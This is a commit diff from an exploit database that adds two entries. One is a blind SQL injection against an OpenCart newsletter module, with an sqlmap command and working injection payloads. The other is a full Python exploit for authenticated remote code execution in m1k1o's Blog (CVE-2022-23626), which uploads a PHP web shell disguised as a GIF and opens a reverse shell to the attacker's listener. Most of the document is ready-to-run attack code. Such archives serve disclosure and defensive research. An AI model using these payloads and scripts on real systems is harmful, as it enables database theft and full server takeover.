DB: 2022-05-24

2 changes to exploits/shellcodes

OpenCart v3.x Newsletter Module - Blind SQLi
m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)

Author: Offensive Security

exploits/php/webapps/50942.txt

@@ -0,0 +1,56 @@
+# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi
+# Date: 19/05/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez
+# Version: v.3.0.2.0
+# Tested on: XAMPP, Linux
+# Contact: https://twitter.com/dmaral3noz
+
+
+* Description :
+
+Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+* Steps to Reproduce :
+- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter
+- Save request in BurpSuite
+- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
+
+
+
+Request :
+
+===========
+
+POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate
+Content-Length: 29
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Connection: Keep-alive
+
+zemez_newsletter_email=saud
+
+
+===========
+
+Output :
+
+Parameter: zemez_newsletter_email (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+    Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

exploits/php/webapps/50943.py

@@ -0,0 +1,161 @@
+# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-01-06
+# Exploit Author: Malte V
+# Vendor Homepage: https://github.com/m1k1o/blog
+# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
+# Version: 1.3 and below
+# Tested on: Linux
+# CVE : CVE-2022-23626
+
+import argparse
+import json
+import re
+from base64 import b64encode
+import requests as req
+from bs4 import BeautifulSoup
+
+parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
+parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
+parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',
+                    required=False)
+parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,
+                    required=False)
+parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,
+                    required=False)
+parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
+parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)
+
+args = vars(parser.parse_args())
+
+username = args['username']
+password = args['password']
+lhost_ip = args['ip']
+lhost_port = args['lport']
+address = args['url']
+port = args['port']
+url = f"http://{address}:{port}"
+
+blog_cookie = ""
+csrf_token = ""
+exploit_file_name = ""
+header = {
+    "Host": f"{address}",
+    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
+    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+    "X-Requested-With": "XMLHttpRequest",
+    "Csrf-Token": f"{csrf_token}",
+    "Cookie": f"PHPSESSID={blog_cookie}"
+}
+
+
+def get_cookie(complete_url):
+    global blog_cookie
+    cookie_header = {}
+    if not blog_cookie:
+        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
+    result = req.get(url=complete_url, headers=cookie_header)
+    if result.status_code == 200:
+        blog_cookie = result.cookies.get_dict()['PHPSESSID']
+        print(f'[+] Found PHPSESSID: {blog_cookie}')
+        grep_csrf(result)
+
+
+def grep_csrf(result):
+    global csrf_token
+    csrf_regex = r"[a-f0-9]{10}"
+    soup = BeautifulSoup(result.text, 'html.parser')
+    script_tag = str(soup.findAll('script')[1].contents[0])
+    csrf_token = re.search(csrf_regex, script_tag).group(0)
+    print(f'[+] Found CSRF-Token: {csrf_token}')
+
+
+def login(username, password):
+    get_cookie(url)
+    login_url = f"{url}/ajax.php"
+    login_data = f"action=login&nick={username}&pass={password}"
+    login_header = {
+        "Host": f"{address}",
+        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+        "X-Requested-With": "XMLHttpRequest",
+        "Csrf-Token": f"{csrf_token}",
+        "Cookie": f"PHPSESSID={blog_cookie}"
+    }
+    result = req.post(url=login_url, headers=login_header, data=login_data)
+    soup = BeautifulSoup(result.text, 'html.parser')
+    login_content = json.loads(soup.text)
+    if login_content.get('logged_in'):
+        print('[*] Successful login')
+    else:
+        print('[!] Bad login')
+
+
+def set_cookie(result):
+    global blog_cookie
+    blog_cookie = result.cookies.get_dict()['PHPSESSID']
+
+
+def generate_payload(command):
+    return f"""
+-----------------------------13148889121752486353560141292
+Content-Disposition: form-data; name="file"; filename="malicious.gif.php"
+Content-Type: application/x-httpd-php
+
+GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;
+-----------------------------13148889121752486353560141292--
+"""
+
+
+def send_payload():
+    payload_header = {
+        "Host": f"{address}",
+        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
+        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+        "X-Requested-With": "XMLHttpRequest",
+        "Csrf-Token": f"{csrf_token}",
+        "Cookie": f"PHPSESSID={blog_cookie}"
+    }
+    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"
+    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
+    payload = generate_payload(command)
+    print(f"[+] Upload exploit")
+    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})
+    set_exploit_file_name(result.content.decode('ascii'))
+
+
+def set_exploit_file_name(data):
+    global exploit_file_name
+    file_regex = r"[a-zA-Z0-9]{4,5}.php"
+    exploit_file_name = re.search(file_regex, data).group(0)
+
+
+def call_malicious_php(file_name):
+    global header
+    complete_url = f"{url}/data/i/{file_name}"
+    print('[*] Calling reverse shell')
+    result = req.get(url=complete_url)
+
+
+def check_reverse_shell():
+    yes = {'yes', 'y', 'ye', ''}
+    no = {'no', 'n'}
+    choice = input("Have you got an active netcat listener (y/Y or n/N): ")
+    if choice in yes:
+        return True
+    elif choice in no:
+        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
+        return False
+
+def main():
+    enabled_listener = check_reverse_shell()
+    if enabled_listener:
+        login(username, password)
+        send_payload()
+        call_malicious_php(exploit_file_name)
+
+
+if __name__ == "__main__":
+    main()

files_exploits.csv

@@ -45004,3 +45004,5 @@ id,file,description,date,author,type,platform,port
 50938,exploits/multiple/webapps/50938.txt,"T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)",1970-01-01,"Alperen Ergel",webapps,multiple,
 50939,exploits/multiple/webapps/50939.txt,"T-Soft E-Commerce 4 - SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,multiple,
 50941,exploits/php/webapps/50941.txt,"Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Akshay Ravi",webapps,php,
+50942,exploits/php/webapps/50942.txt,"OpenCart v3.x Newsletter Module - Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php,
+50943,exploits/php/webapps/50943.py,"m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Malte V",webapps,php,